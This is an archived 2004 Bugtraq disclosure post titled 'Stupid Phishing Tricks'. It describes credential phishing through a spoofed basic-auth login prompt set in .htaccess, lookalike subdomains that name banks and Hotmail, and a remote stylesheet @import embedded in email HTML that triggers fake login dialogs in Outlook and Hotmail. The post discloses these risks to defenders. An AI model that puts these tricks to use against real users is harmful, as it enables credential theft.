lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 21 May 2004 13:46:47 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Cc: <NTBugtraq@...tserv.ntbugtraq.com>
Subject: Stupid Phishing Tricks




Phriday , May 21, 2004

Several pheeble yet interesting phishing possibilities arise as 
phollows:

Take one .htaccess trivially modified to suit the target 
scenario:

AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
AuthType Basic

One throw-away domain which can include the target's host name:

http://www.hotmail.hackerguy.nickelandimehosting.com
http://www.evenlargerbank.money.nickelandimehosting.com
http://www.bloatedcorp.lackey.nickelandimehosting.com

A couple of ridiculous email contraptions:

<STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
 </STYLE>

1. Outlook Express

[screen shot http://www.malware.com/phool.png 56KB]

2. Outlook 2003

[screen shot: http://www.malware.com/ohlook.png 39KB]

note: the above 'style sheet' works on outbound [reply to] [so 
much for not downloading external content] inbound can be 
achieved as well via http://securityfocus.com/bid/10369 which 
has an even more convincing network login applet

3. Hotmail

[screen shot: http://www.malware.com/goturmail.png 91KB]

hint : hotmail[and other] web designer people; off-set the html 
login form on the site as many prime banks have done.

The possibilities are obviously endless.


BE AWARE OF THE SHARKS OUT THERE


NB: anyone have any contact or connection to the upper 
management security or abuse dept. of one public company called: 
SAVVIS Communications. http://savvis.net/ it appears their abuse 
dept. is woefully negligent in attending to abuse affairs.


End Call

-- 
http://www.malware.com






Powered by blists - more mailing lists